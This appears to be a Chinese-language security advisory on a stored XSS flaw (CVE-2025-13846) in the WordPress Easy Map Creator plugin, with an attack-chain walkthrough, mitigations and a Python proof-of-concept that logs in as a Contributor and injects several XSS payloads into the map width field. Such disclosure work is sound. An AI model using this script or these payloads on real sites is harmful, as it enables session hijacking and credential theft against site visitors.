CVE-2025-13846 WordPress Easy Map Creator插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-13846

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Easy Map Creator WordPress插件

漏洞概述

CVE-2025-13846是WordPress Easy Map Creator插件中的一个存储型跨站脚本（Stored Cross-Site Scripting）漏洞。该插件是一款用于在WordPress网站上创建和管理地图的工具，在全球范围内被广泛使用。漏洞源于插件对用户输入的'width'参数缺乏充分的输入验证和输出转义处理，导致恶意JavaScript代码可以被永久存储在数据库中。受影响版本为3.0.2及之前的所有版本。攻击者需要至少具有Contributor（贡献者）级别的WordPress用户权限即可利用此漏洞。一旦攻击成功，恶意脚本将在所有访问包含该地图的页面用户浏览器中执行，可能导致会话劫持、凭据窃取、恶意重定向等安全问题。由于是存储型XSS，攻击只需一次注入即可影响所有访问该页面的用户，危害范围广泛。

技术细节

该漏洞的根本原因在于Easy Map Creator插件在处理地图宽度参数时未进行适当的输入清理和输出编码。在easy_map_creator.php文件的第139行附近，插件直接使用用户提供的width参数值而未进行sanitization或htmlspecialchars()等转义处理。攻击者通过构造包含JavaScript代码的width参数值（如 '100 onerror=alert(document.cookie)' 或 '100" onfocus="alert(1)" autofocus x="'），该值会被存储在WordPress数据库中。当其他用户访问包含该地图的页面时，未转义的恶意代码会作为HTML的一部分被浏览器解析执行。攻击者利用Contributor权限创建或编辑地图内容，注入恶意脚本。由于WordPress的地图内容通常在文章/页面中以iframe或script标签形式加载，存储型XSS payload可以绑过常规的内容过滤机制。CVSS 3.1向量显示攻击复杂度低（AC:L），无需用户交互（UI:N），但攻击者需要低权限（PR:L）认证。

攻击链分析

STEP 1

1

侦察阶段：攻击者识别目标WordPress网站并确认安装了Easy Map Creator插件（版本<=3.0.2）

STEP 2

2

初始访问：攻击者获取WordPress Contributor级别账户或通过其他方式获得低权限账号

STEP 3

3

漏洞利用：攻击者登录WordPress后台，导航至Easy Map Creator插件创建/编辑地图页面

STEP 4

4

Payload注入：在地图设置的width参数中注入恶意JavaScript代码，如100 onerror=alert(document.cookie)

STEP 5

5

持久化：提交表单后，恶意payload被存储在WordPress数据库中，由于未进行输入验证和输出转义

STEP 6

6

触发：任何用户访问包含该恶意地图的页面时，浏览器会解析并执行存储的恶意脚本

STEP 7

7

影响：攻击者可窃取用户会话cookie、凭据，进行会话劫持或将用户重定向至恶意网站

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-13846 Easy Map Creator Stored XSS PoC
# Author: Security Researcher
# Target: WordPress Easy Map Creator Plugin <= 3.0.2

import requests
from bs4 import BeautifulSoup

# Configuration
target_url = "http://target-wordpress-site.com"
username = "attacker_contributor"  # Contributor level account
password = "attacker_password"

# XSS Payloads for width parameter
xss_payloads = [
    '100 onerror=alert(document.cookie)',
    '100"><script>alert(String.fromCharCode(88,83,83))</script>',
    '100" onfocus="alert(document.domain)" autofocus x="',
    '100 onload=eval(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="))'
]

def get_nonce(login_url):
    """Extract WordPress nonce for form submission"""
    response = requests.get(login_url)
    soup = BeautifulSoup(response.text, 'html.parser')
    nonce_tag = soup.find('input', {'id': '_wpnonce'})
    return nonce_tag['value'] if nonce_tag else None

def exploit_stored_xss():
    """Exploit the stored XSS vulnerability in Easy Map Creator"""
    session = requests.Session()
    
    # Step 1: Login to WordPress as Contributor
    login_url = f"{target_url}/wp-login.php"
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': f"{target_url}/wp-admin/"
    }
    session.post(login_url, data=login_data)
    
    # Step 2: Access Easy Map Creator admin page
    map_admin_url = f"{target_url}/wp-admin/admin.php?page=easy-map-creator"
    
    # Step 3: Create new map with malicious width parameter
    create_map_url = f"{target_url}/wp-admin/admin.php?page=easy-map-creator&action=new"
    
    for payload in xss_payloads:
        map_data = {
            '_wpnonce': get_nonce(create_map_url),
            'map_title': 'Malicious Map',
            'map_width': payload,  # XSS injection point
            'map_height': '400',
            'submit': 'Save Map'
        }
        response = session.post(create_map_url, data=map_data)
        print(f"[*] Payload sent: {payload}")
        
    print("[+] XSS payload stored successfully")
    print("[*] Any user viewing the map will trigger the XSS")

if __name__ == "__main__":
    exploit_stored_xss()

影响范围

Easy Map Creator WordPress插件 <= 3.0.2

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1）限制WordPress注册功能，避免创建新Contributor账户；2）审查现有Contributor及以上权限用户，移除可疑账户；3）临时禁用Easy Map Creator插件或限制其使用范围；4）通过Web应用防火墙（WAF）规则过滤width参数中的特殊字符（如<、>、"、'、onerror、onload等）；5）使用WordPress的disable_embeds和严格的内容过滤功能；6）监控管理员日志，关注异常的地图创建和编辑活动。